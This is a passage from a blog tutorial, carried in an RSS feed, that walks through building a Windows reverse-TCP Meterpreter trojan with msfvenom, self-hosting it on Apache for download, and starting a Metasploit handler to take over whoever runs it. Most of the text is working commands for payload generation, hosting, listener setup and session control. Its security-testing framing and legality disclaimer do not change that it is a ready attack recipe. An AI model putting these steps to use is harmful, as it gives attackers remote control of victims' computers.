We will use Metasploit&apos;s built-in program `msfvenom`.

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=5555 -f exe &gt; trojan.exe
```

- `LHOST`: Your Public IP Address
- `LPORT`: The port number you opened
- `trojan.exe`: The name of the generated file
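
The IP lookup and payload generation can be combined so the payload always embeds your current public IP. A sketch that just prints the command it would run (`1.1.1.1` is a placeholder fallback for offline use):

```bash
LHOST=$(curl -s -m 5 ifconfig.me)   # your public IP; empty when offline
LHOST="${LHOST:-1.1.1.1}"           # placeholder fallback
LPORT=5555
echo "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o trojan.exe" | tee msfvenom_cmd.txt
```

Copy the printed line and run it on your attacking machine.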

## Create Download Link

To allow users to access your website and download the file, you can set up Apache or Nginx, or use a simple Python server. Hosting the file yourself keeps it fully under your control and ensures it isn&apos;t tampered with by a third-party host, so it&apos;s better to self-host the file :D

First, allow port 80:

```bash
sudo ufw allow 80
```

### Copy the Backdoor Program to the Web Server

use the `cp` command to copy the generated backdoor program to your web server. The web server path is:

```bash
/var/www/html
```

Copy the file to the directory:

```bash
cp -v trojan.exe /var/www/html/
```
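
Since the point of self-hosting is keeping the file trustworthy, you can publish a checksum next to it so testers can verify the download. A sketch (the `printf` line creates a dummy stand-in so it runs anywhere):

```bash
FILE=trojan.exe
printf 'dummy payload\n' | tee "$FILE"    # stand-in; on the server this is the real file
sha256sum "$FILE" | tee "$FILE.sha256"
# cp -v "$FILE" "$FILE.sha256" /var/www/html/   # uncomment on the server
```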

Open a browser and enter your server&apos;s IP address to confirm that the web server&apos;s default page loads.

## Download the File

Use a browser to enter your IP address and the file name to test the download:

```
123.123.123.123/trojan.exe
```

## Metasploit Listener

After confirming the file can be downloaded, we need to use the `msfconsole` to set up the listener.

Open Metasploit:

```bash
msfconsole
```

### Use the Specified Module

Enter the following commands to create our listener of reverse TCP:

```bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
```

### Set Payload Options

In the console, the handler does not yet know which host and port your backdoor program will call back to. We need to set these options so the listener matches the payload you generated.

Show current options:

```sh
show options
```

You will see two options that need to be modified: `LHOST` and `LPORT`. Set them to your public IP and the TCP port you opened.

Set the IP address:

```sh
set LHOST [IPV4_Address]
```

Set the port number:

```sh
set LPORT [Port_Number]
```

### Verify the Settings

Check the current settings:

```sh
show options
```

### Wait for the Backdoor Program to be Opened

Once everything is set, you can start listening for someone to open your backdoor program. When someone opens the file, your console will respond, and you will have successfully compromised the computer.

There are a few methods to start listening:

#### Method 1: `exploit`

This method does not allow you to work in the same window while waiting. You can stop the process by pressing `Ctrl+C`.

Start listening:

```sh
exploit
```

#### Method 2: `run`

`run` is an alias for `exploit` and behaves the same way: the console stays blocked while listening, and you can stop the process by pressing `Ctrl+C`.

Start listening:

```sh
run
```

#### Method 3: `exploit -j -z`

This method allows you to continue working in the same window, but you need to manually enter the session.

Start listening:

```sh
exploit -j -z
```

When the target opens the file, your console will respond. You need to enter the session to control the system.

First, check the current sessions:

```sh
sessions
```

You will see an ID, for example, `1`. Use the `-i` option to enter the session:

```sh
sessions -i 1
```
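
All of the listener setup above can be captured in a Metasploit resource script, so a single command brings the handler up. A sketch (the filename `handler.rc` and the IP/port values are placeholders matching the earlier examples):

```bash
printf 'use exploit/multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset LHOST 1.1.1.1\nset LPORT 5555\nexploit -j -z\n' | tee handler.rc
# msfconsole -r handler.rc   # starts msfconsole with the handler already listening
```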

## Conclusion

You have successfully created a trojan backdoor with a remote code execution payload in Metasploit. You can now access the target system and control it remotely. Remember to use this knowledge responsibly and legally. Unauthorized access to systems is illegal and unethical. The methods here are used for legitimate recovery and testing, not for illegal activities. Have fun hacking :)

### Do We Need to Learn Metasploit?

My answer is: it can be yes or no.

Metasploit is essentially a command-line interface (CLI) tool for testing exploits and vulnerabilities. If you are targeting a bug bounty program or working as a red team professional, Metasploit should be quite simple for you to use. Learning Metasploit is beneficial, but it is even more valuable to spend time learning how to write your own exploits and understand the underlying exploit code. Relying solely on pre-made tools like Metasploit may not be the best approach.

For example, understanding OWASP&apos;s Top 10 vulnerabilities, such as SQL injection (including error-based, UNION-based, and blind SQL injection), is crucial. It is better to invest time in learning these concepts rather than just using existing tools. This deeper understanding will make you a more effective and versatile security professional.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item></channel></rss>